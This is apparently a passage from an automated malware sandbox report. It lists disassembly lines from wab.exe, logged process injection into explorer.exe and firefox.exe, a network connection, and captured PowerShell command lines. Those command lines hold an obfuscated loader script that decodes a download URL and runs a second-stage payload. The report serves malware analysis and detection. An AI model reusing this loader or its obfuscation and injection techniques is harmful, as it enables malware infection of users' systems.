Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E60B8 mov ecx, dword ptr fs:[00000030h] 20_2_224E60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419148 mov eax, dword ptr fs:[00000030h] 20_2_22419148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419148 mov eax, dword ptr fs:[00000030h] 20_2_22419148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419148 mov eax, dword ptr fs:[00000030h] 20_2_22419148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419148 mov eax, dword ptr fs:[00000030h] 20_2_22419148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov ecx, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427152 mov eax, dword ptr fs:[00000030h] 20_2_22427152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B8158 mov eax, dword ptr fs:[00000030h] 20_2_224B8158
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22426154 mov eax, dword ptr fs:[00000030h] 20_2_22426154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22426154 mov eax, dword ptr fs:[00000030h] 20_2_22426154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241C156 mov eax, dword ptr fs:[00000030h] 20_2_2241C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5152 mov eax, dword ptr fs:[00000030h] 20_2_224F5152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B9179 mov eax, dword ptr fs:[00000030h] 20_2_224B9179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 mov ecx, dword ptr fs:[00000030h] 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h] 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h] 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h] 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E0115 mov eax, dword ptr fs:[00000030h] 20_2_224E0115
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22450124 mov eax, dword ptr fs:[00000030h] 20_2_22450124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22421131 mov eax, dword ptr fs:[00000030h] 20_2_22421131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22421131 mov eax, dword ptr fs:[00000030h] 20_2_22421131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h] 20_2_2241B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F51CB mov eax, dword ptr fs:[00000030h] 20_2_224F51CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E61C3 mov eax, dword ptr fs:[00000030h] 20_2_224E61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245D1D0 mov eax, dword ptr fs:[00000030h] 20_2_2245D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245D1D0 mov ecx, dword ptr fs:[00000030h] 20_2_2245D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h] 20_2_2249E1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E1D0 mov ecx, dword ptr fs:[00000030h] 20_2_2249E1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F61E5 mov eax, dword ptr fs:[00000030h] 20_2_224F61E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224251ED mov eax, dword ptr fs:[00000030h] 20_2_224251ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224C71F9 mov esi, dword ptr fs:[00000030h] 20_2_224C71F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224501F8 mov eax, dword ptr fs:[00000030h] 20_2_224501F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22460185 mov eax, dword ptr fs:[00000030h] 20_2_22460185
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DC188 mov eax, dword ptr fs:[00000030h] 20_2_224DC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A019F mov eax, dword ptr fs:[00000030h] 20_2_224A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A197 mov eax, dword ptr fs:[00000030h] 20_2_2241A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22477190 mov eax, dword ptr fs:[00000030h] 20_2_22477190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h] 20_2_224D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243B1B0 mov eax, dword ptr fs:[00000030h] 20_2_2243B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243C640 mov eax, dword ptr fs:[00000030h] 20_2_2243C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E866E mov eax, dword ptr fs:[00000030h] 20_2_224E866E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A660 mov eax, dword ptr fs:[00000030h] 20_2_2245A660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22459660 mov eax, dword ptr fs:[00000030h] 20_2_22459660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22452674 mov eax, dword ptr fs:[00000030h] 20_2_22452674
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E609 mov eax, dword ptr fs:[00000030h] 20_2_2249E609
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22451607 mov eax, dword ptr fs:[00000030h] 20_2_22451607
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245F603 mov eax, dword ptr fs:[00000030h] 20_2_2245F603
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243260B mov eax, dword ptr fs:[00000030h] 20_2_2243260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22423616 mov eax, dword ptr fs:[00000030h] 20_2_22423616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462619 mov eax, dword ptr fs:[00000030h] 20_2_22462619
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E627 mov eax, dword ptr fs:[00000030h] 20_2_2243E627
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22456620 mov eax, dword ptr fs:[00000030h] 20_2_22456620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22458620 mov eax, dword ptr fs:[00000030h] 20_2_22458620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242262C mov eax, dword ptr fs:[00000030h] 20_2_2242262C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5636 mov eax, dword ptr fs:[00000030h] 20_2_224F5636
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h] 20_2_2242B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A6C7 mov ebx, dword ptr fs:[00000030h] 20_2_2245A6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A6C7 mov eax, dword ptr fs:[00000030h] 20_2_2245A6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h] 20_2_224E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF6C7 mov eax, dword ptr fs:[00000030h] 20_2_224DF6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224516CF mov eax, dword ptr fs:[00000030h] 20_2_224516CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244D6E0 mov eax, dword ptr fs:[00000030h] 20_2_2244D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h] 20_2_224B36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224536EF mov eax, dword ptr fs:[00000030h] 20_2_224536EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h] 20_2_2249E6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A06F1 mov eax, dword ptr fs:[00000030h] 20_2_224A06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DD6F0 mov eax, dword ptr fs:[00000030h] 20_2_224DD6F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A368C mov eax, dword ptr fs:[00000030h] 20_2_224A368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424690 mov eax, dword ptr fs:[00000030h] 20_2_22424690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245C6A6 mov eax, dword ptr fs:[00000030h] 20_2_2245C6A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D6AA mov eax, dword ptr fs:[00000030h] 20_2_2241D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224176B2 mov eax, dword ptr fs:[00000030h] 20_2_224176B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224566B0 mov eax, dword ptr fs:[00000030h] 20_2_224566B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22433740 mov eax, dword ptr fs:[00000030h] 20_2_22433740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F3749 mov eax, dword ptr fs:[00000030h] 20_2_224F3749
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245674D mov esi, dword ptr fs:[00000030h] 20_2_2245674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245674D mov eax, dword ptr fs:[00000030h] 20_2_2245674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22420750 mov eax, dword ptr fs:[00000030h] 20_2_22420750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462750 mov eax, dword ptr fs:[00000030h] 20_2_22462750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224AE75D mov eax, dword ptr fs:[00000030h] 20_2_224AE75D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A4755 mov eax, dword ptr fs:[00000030h] 20_2_224A4755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h] 20_2_2241B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22428770 mov eax, dword ptr fs:[00000030h] 20_2_22428770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22425702 mov eax, dword ptr fs:[00000030h] 20_2_22425702
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427703 mov eax, dword ptr fs:[00000030h] 20_2_22427703
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245C700 mov eax, dword ptr fs:[00000030h] 20_2_2245C700
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22420710 mov eax, dword ptr fs:[00000030h] 20_2_22420710
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22450710 mov eax, dword ptr fs:[00000030h] 20_2_22450710
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245F71F mov eax, dword ptr fs:[00000030h] 20_2_2245F71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22423720 mov eax, dword ptr fs:[00000030h] 20_2_22423720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243F720 mov eax, dword ptr fs:[00000030h] 20_2_2243F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF72E mov eax, dword ptr fs:[00000030h] 20_2_224DF72E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245C720 mov eax, dword ptr fs:[00000030h] 20_2_2245C720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E972B mov eax, dword ptr fs:[00000030h] 20_2_224E972B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419730 mov eax, dword ptr fs:[00000030h] 20_2_22419730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22455734 mov eax, dword ptr fs:[00000030h] 20_2_22455734
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h] 20_2_224FB73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242973A mov eax, dword ptr fs:[00000030h] 20_2_2242973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245273C mov eax, dword ptr fs:[00000030h] 20_2_2245273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245273C mov ecx, dword ptr fs:[00000030h] 20_2_2245273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249C730 mov eax, dword ptr fs:[00000030h] 20_2_2249C730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242C7C0 mov eax, dword ptr fs:[00000030h] 20_2_2242C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224257C0 mov eax, dword ptr fs:[00000030h] 20_2_224257C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A07C3 mov eax, dword ptr fs:[00000030h] 20_2_224A07C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242D7E0 mov ecx, dword ptr fs:[00000030h] 20_2_2242D7E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224427ED mov eax, dword ptr fs:[00000030h] 20_2_224427ED
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8949C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc, 25_2_00C8949C
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C92000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_00C92000
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C926B0 SetUnhandledExceptionFilter, 25_2_00C926B0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 46.23.69.44 80
Source: Yara match File source: amsi64_7428.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTR
Source: C:\Windows\SysWOW64\raserver.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000 value starts with: 4D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread register set: target process: 4056
Source: C:\Windows\SysWOW64\raserver.exe Thread register set: target process: 4056
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: C80000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 70FFD8
Source: C:\Windows\SysWOW64\raserver.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
